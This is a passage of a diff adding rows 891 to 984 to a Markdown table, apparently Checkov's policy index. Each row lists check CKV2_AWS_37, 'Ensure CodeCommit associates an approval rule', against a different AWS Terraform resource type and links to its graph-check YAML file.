+|  891 | CKV2_AWS_37     | resource | aws_kinesis_video_stream                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  892 | CKV2_AWS_37     | resource | aws_kms_alias                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  893 | CKV2_AWS_37     | resource | aws_kms_ciphertext                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  894 | CKV2_AWS_37     | resource | aws_kms_external_key                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  895 | CKV2_AWS_37     | resource | aws_kms_grant                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  896 | CKV2_AWS_37     | resource | aws_kms_key                                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  897 | CKV2_AWS_37     | resource | aws_lambda_alias                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  898 | CKV2_AWS_37     | resource | aws_lambda_event_source_mapping                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  899 | CKV2_AWS_37     | resource | aws_lambda_function                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  900 | CKV2_AWS_37     | resource | aws_lambda_function_event_invoke_config                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  901 | CKV2_AWS_37     | resource | aws_lambda_layer_version                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  902 | CKV2_AWS_37     | resource | aws_lambda_permission                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  903 | CKV2_AWS_37     | resource | aws_lambda_provisioned_concurrency_config               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  904 | CKV2_AWS_37     | resource | aws_launch_configuration                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  905 | CKV2_AWS_37     | resource | aws_launch_template                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  906 | CKV2_AWS_37     | resource | aws_lb                                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  907 | CKV2_AWS_37     | resource | aws_lb_cookie_stickiness_policy                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  908 | CKV2_AWS_37     | resource | aws_lb_listener                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  909 | CKV2_AWS_37     | resource | aws_lb_listener_certificate                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  910 | CKV2_AWS_37     | resource | aws_lb_listener_rule                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  911 | CKV2_AWS_37     | resource | aws_lb_ssl_negotiation_policy                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  912 | CKV2_AWS_37     | resource | aws_lb_target_group                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  913 | CKV2_AWS_37     | resource | aws_lb_target_group_attachment                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  914 | CKV2_AWS_37     | resource | aws_licensemanager_association                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  915 | CKV2_AWS_37     | resource | aws_licensemanager_license_configuration                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  916 | CKV2_AWS_37     | resource | aws_lightsail_domain                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  917 | CKV2_AWS_37     | resource | aws_lightsail_instance                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  918 | CKV2_AWS_37     | resource | aws_lightsail_key_pair                                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  919 | CKV2_AWS_37     | resource | aws_lightsail_static_ip                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  920 | CKV2_AWS_37     | resource | aws_lightsail_static_ip_attachment                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  921 | CKV2_AWS_37     | resource | aws_load_balancer_backend_server_policy                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  922 | CKV2_AWS_37     | resource | aws_load_balancer_listener_policy                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  923 | CKV2_AWS_37     | resource | aws_load_balancer_policy                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  924 | CKV2_AWS_37     | resource | aws_macie_member_account_association                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  925 | CKV2_AWS_37     | resource | aws_macie_s3_bucket_association                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  926 | CKV2_AWS_37     | resource | aws_main_route_table_association                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  927 | CKV2_AWS_37     | resource | aws_media_convert_queue                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  928 | CKV2_AWS_37     | resource | aws_media_package_channel                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  929 | CKV2_AWS_37     | resource | aws_media_store_container                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  930 | CKV2_AWS_37     | resource | aws_media_store_container_policy                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  931 | CKV2_AWS_37     | resource | aws_mq_broker                                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  932 | CKV2_AWS_37     | resource | aws_mq_configuration                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  933 | CKV2_AWS_37     | resource | aws_msk_cluster                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  934 | CKV2_AWS_37     | resource | aws_msk_configuration                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  935 | CKV2_AWS_37     | resource | aws_nat_gateway                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  936 | CKV2_AWS_37     | resource | aws_neptune_cluster                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  937 | CKV2_AWS_37     | resource | aws_neptune_cluster_instance                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  938 | CKV2_AWS_37     | resource | aws_neptune_cluster_parameter_group                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  939 | CKV2_AWS_37     | resource | aws_neptune_cluster_snapshot                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  940 | CKV2_AWS_37     | resource | aws_neptune_event_subscription                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  941 | CKV2_AWS_37     | resource | aws_neptune_parameter_group                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  942 | CKV2_AWS_37     | resource | aws_neptune_subnet_group                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  943 | CKV2_AWS_37     | resource | aws_network_acl                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  944 | CKV2_AWS_37     | resource | aws_network_acl_rule                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  945 | CKV2_AWS_37     | resource | aws_network_interface                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  946 | CKV2_AWS_37     | resource | aws_network_interface_attachment                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  947 | CKV2_AWS_37     | resource | aws_network_interface_sg_attachment                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  948 | CKV2_AWS_37     | resource | aws_opsworks_application                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  949 | CKV2_AWS_37     | resource | aws_opsworks_custom_layer                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  950 | CKV2_AWS_37     | resource | aws_opsworks_ganglia_layer                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  951 | CKV2_AWS_37     | resource | aws_opsworks_haproxy_layer                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  952 | CKV2_AWS_37     | resource | aws_opsworks_instance                                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  953 | CKV2_AWS_37     | resource | aws_opsworks_java_app_layer                             | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  954 | CKV2_AWS_37     | resource | aws_opsworks_memcached_layer                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  955 | CKV2_AWS_37     | resource | aws_opsworks_mysql_layer                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  956 | CKV2_AWS_37     | resource | aws_opsworks_nodejs_app_layer                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  957 | CKV2_AWS_37     | resource | aws_opsworks_permission                                 | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  958 | CKV2_AWS_37     | resource | aws_opsworks_php_app_layer                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  959 | CKV2_AWS_37     | resource | aws_opsworks_rails_app_layer                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  960 | CKV2_AWS_37     | resource | aws_opsworks_rds_db_instance                            | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  961 | CKV2_AWS_37     | resource | aws_opsworks_stack                                      | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  962 | CKV2_AWS_37     | resource | aws_opsworks_static_web_layer                           | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  963 | CKV2_AWS_37     | resource | aws_opsworks_user_profile                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  964 | CKV2_AWS_37     | resource | aws_organizations_account                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  965 | CKV2_AWS_37     | resource | aws_organizations_organization                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  966 | CKV2_AWS_37     | resource | aws_organizations_organizational_unit                   | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  967 | CKV2_AWS_37     | resource | aws_organizations_policy                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  968 | CKV2_AWS_37     | resource | aws_organizations_policy_attachment                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  969 | CKV2_AWS_37     | resource | aws_pinpoint_adm_channel                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  970 | CKV2_AWS_37     | resource | aws_pinpoint_apns_channel                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  971 | CKV2_AWS_37     | resource | aws_pinpoint_apns_sandbox_channel                       | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  972 | CKV2_AWS_37     | resource | aws_pinpoint_apns_voip_channel                          | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  973 | CKV2_AWS_37     | resource | aws_pinpoint_apns_voip_sandbox_channel                  | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  974 | CKV2_AWS_37     | resource | aws_pinpoint_app                                        | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  975 | CKV2_AWS_37     | resource | aws_pinpoint_baidu_channel                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  976 | CKV2_AWS_37     | resource | aws_pinpoint_email_channel                              | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  977 | CKV2_AWS_37     | resource | aws_pinpoint_event_stream                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  978 | CKV2_AWS_37     | resource | aws_pinpoint_gcm_channel                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  979 | CKV2_AWS_37     | resource | aws_pinpoint_sms_channel                                | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  980 | CKV2_AWS_37     | resource | aws_placement_group                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  981 | CKV2_AWS_37     | resource | aws_proxy_protocol_policy                               | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  982 | CKV2_AWS_37     | resource | aws_qldb_ledger                                         | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  983 | CKV2_AWS_37     | resource | aws_quicksight_group                                    | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
+|  984 | CKV2_AWS_37     | resource | aws_quicksight_user                                     | Ensure CodeCommit associates an approval rule                                                                                                                                                            | Terraform | [CodecommitApprovalRulesAttached.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/aws/CodecommitApprovalRulesAttached.yaml)                                                         |
